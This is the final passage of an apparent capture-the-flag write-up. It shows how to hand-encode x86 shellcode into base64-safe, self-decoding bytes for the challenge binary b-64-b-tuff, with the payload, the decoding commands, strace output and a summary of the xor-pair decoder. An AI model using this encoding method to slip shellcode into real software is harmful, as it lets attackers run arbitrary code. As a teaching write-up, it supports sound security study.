Solving the level

Bringing it back to the actual challenge... Now that we have working base 64 code, the rest is pretty simple. Since the app encodes the base64 for us, we have to take what we have and decode it first, to get the string that would generate the base64 we want. Because base64 works in blocks and has padding, we're going to append a few meaningless bytes to the end so that if anything gets messed up by being a partial block, they will. Here's the full "exploit", assembled:

hAAAAX5AAAAPPPPPPPPahABjjX5AC++PYhABAAZ1QAhFAAAX59AAAPZB1QAAAAAhAAjjZ1QAhFAAAX59AAAPZBWRLZD1QAAAAAhjjbAZ1QAhFAAAX59AAAPZBWRLLZDD1QAhFAAAX59AAAPZBWRLLLZDDD1QAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAyCAAAz++++/A

We're going to add a few 'A's to the end for padding (the character we choose is meaningless), and run it through base64 -d (adding '='s to the end until we stop getting decoding errors):

$ echo 'hAAAAX5AAAAPPPPPPPPahABjjX5AC++PYhABAAZ1QAhFAAAX59AAAPZB1QAAAAAhAAjjZ1QAhFAAAX59AAAPZBWRLZD1QAAAAAhjjbAZ1QAhFAAAX59AAAPZBWRLLZDD1QAhFAAAX59AAAPZBWRLLLZDDD1QAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAyCAAAz++++/AAAAAAA=' | base64 -d | hexdump -Cv
00000000  84 00 00 01 7e 40 00 00  0f 3c f3 cf 3c f3 da 84  |....~@...<..<...|
00000010  00 63 8d 7e 40 0b ef 8f  62 10 01 00 06 75 40 08  |.c.~@...b....u@.|
00000020  45 00 00 17 e7 d0 00 00  f6 41 d5 00 00 00 00 21  |E........A.....!|
00000030  00 08 e3 67 54 00 84 50  00 01 7e 7d 00 00 0f 64  |...gT..P..~}...d|
00000040  15 91 2d 90 f5 40 00 00  00 08 63 8d b0 19 d5 00  |..-..@....c.....|
00000050  21 14 00 00 5f 9f 40 00  03 d9 05 64 4b 2d 90 c3  |!..._.@....dK-..|
00000060  d5 00 21 14 00 00 5f 9f  40 00 03 d9 05 64 4b 2c  |..!..._.@....dK,|
00000070  b6 43 0c 3d 50 00 00 00  00 00 00 00 00 00 00 00  |.C.=P...........|
00000080  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000090  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
000000a0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
000000b0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
000000c0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
000000d0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
000000e0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
000000f0  03 20 80 00 0c fe fb ef  bf 00 00 00 00 00        |. ............|

Let's convert that into a string that we can use on the commandline by chaining together a bunch of shell commands:

echo -ne 'hAAAAX5AAAAPPPPPPPPahABjjX5AC++PYhABAAZ1QAhFAAAX59AAAPZB1QAAAAAhAAjjZ1QAhFAAAX59AAAPZBWRLZD1QAAAAAhjjbAZ1QAhFAAAX59AAAPZBWRLLZDD1QAhFAAAX59AAAPZBWRLLLZDDD1QAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAyCAAAz++++/AAAAAAA=' | base64 -d | xxd -g1 file | cut -b10-57 | tr -d '\n' | sed 's/ /\\x/g'
\x84\x00\x00\x01\x7e\x40\x00\x00\x0f\x3c\xf3\xcf\x3c\xf3\xda\x84\x00\x63\x8d\x7e\x40\x0b\xef\x8f\x62\x10\x01\x00\x06\x75\x40\x08\x45\x00\x00\x17\xe7\xd0\x00\x00\xf6\x41\xd5\x00\x00\x00\x00\x21\x00\x08\xe3\x67\x54\x00\x84\x50\x00\x01\x7e\x7d\x00\x00\x0f\x64\x15\x91\x2d\x90\xf5\x40\x00\x00\x00\x08\x63\x8d\xb0\x19\xd5\x00\x21\x14\x00\x00\x5f\x9f\x40\x00\x03\xd9\x05\x64\x4b\x2d\x90\xc3\xd5\x00\x21\x14\x00\x00\x5f\x9f\x40\x00\x03\xd9\x05\x64\x4b\x2c\xb6\x43\x0c\x3d\x50\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x20\x80\x00\x0c\xfe\xfb\xef\xbf\x00\x00\x00\x00\x00

And, finally, feed all that into b-64-b-tuff:

$ echo -ne '\x84\x00\x00\x01\x7e\x40\x00\x00\x0f\x3c\xf3\xcf\x3c\xf3\xda\x84\x00\x63\x8d\x7e\x40\x0b\xef\x8f\x62\x10\x01\x00\x06\x75\x40\x08\x45\x00\x00\x17\xe7\xd0\x00\x00\xf6\x41\xd5\x00\x00\x00\x00\x21\x00\x08\xe3\x67\x54\x00\x84\x50\x00\x01\x7e\x7d\x00\x00\x0f\x64\x15\x91\x2d\x90\xf5\x40\x00\x00\x00\x08\x63\x8d\xb0\x19\xd5\x00\x21\x14\x00\x00\x5f\x9f\x40\x00\x03\xd9\x05\x64\x4b\x2d\x90\xc3\xd5\x00\x21\x14\x00\x00\x5f\x9f\x40\x00\x03\xd9\x05\x64\x4b\x2c\xb6\x43\x0c\x3d\x50\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x20\x80\x00\x0c\xfe\xfb\xef\xbf\x00\x00\x00\x00\x00' | strace ./b-64-b-tuff
read(0, "\204\0\0\1~@\0\0\17<\363\317<\363\332\204\0c\215~@\v\357\217b\20\1\0\6u@\10"..., 4096) = 254
write(1, "Read 254 bytes!\n", 16Read 254 bytes!
)       = 16
write(1, "hAAAAX5AAAAPPPPPPPPahABjjX5AC++P"..., 340hAAAAX5AAAAPPPPPPPPahABjjX5AC++PYhABAAZ1QAhFAAAX59AAAPZB1QAAAAAhAAjjZ1QAhFAAAX59AAAPZBWRLZD1QAAAAAhjjbAZ1QAhFAAAX59AAAPZBWRLLZDD1QAhFAAAX59AAAPZBWRLLLZDDD1QAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAyCAAAz++++/AAAAAAA=) = 340
write(1, "\n", 1
)                       = 1
exit(1094795585)                        = ?
+++ exited with 65 +++

And, sure enough, it exited with the status that we wanted! Now that we've encoded 12 bytes of shellcode, we can encode any amount of arbitrary code that we choose to!

Summary

So that, ladies and gentlemen and everyone else, is how to encode some simple shellcode into base64 by hand. My solution does almost exactly those steps, but in an automated fashion. I also found a few shortcuts while writing the blog that aren't included in that code. To summarize:

Pad the input to a multiple of 4 bytes
Break the input up into 4-byte blocks, and find an xor pair that generates each value
Set ecx to a value that's 0x41 bits before the encoded payload, which is half of the xor pairs
Put the other half the xor pair in-line, loaded into edx and xor'd with the encoded payload
If there are any MSB bits set, set edx to 0x80 and use the stack to shift them into the right place to be inserted with a xor
After all the xors, add padding that's base64-compatible, but is effectively a no-op, to bridge between the decoder and the encoded payload
End with the encoded stub (second half of the xor pairs)

When the code runs, it xors each pair, and writes it in-line to where the encoded value was. It sets the MSB bits as needed. The padding runs, which is an effective no-op, then finally the freshly decoded code runs. It's complex, but hopefully this blog helps explain it!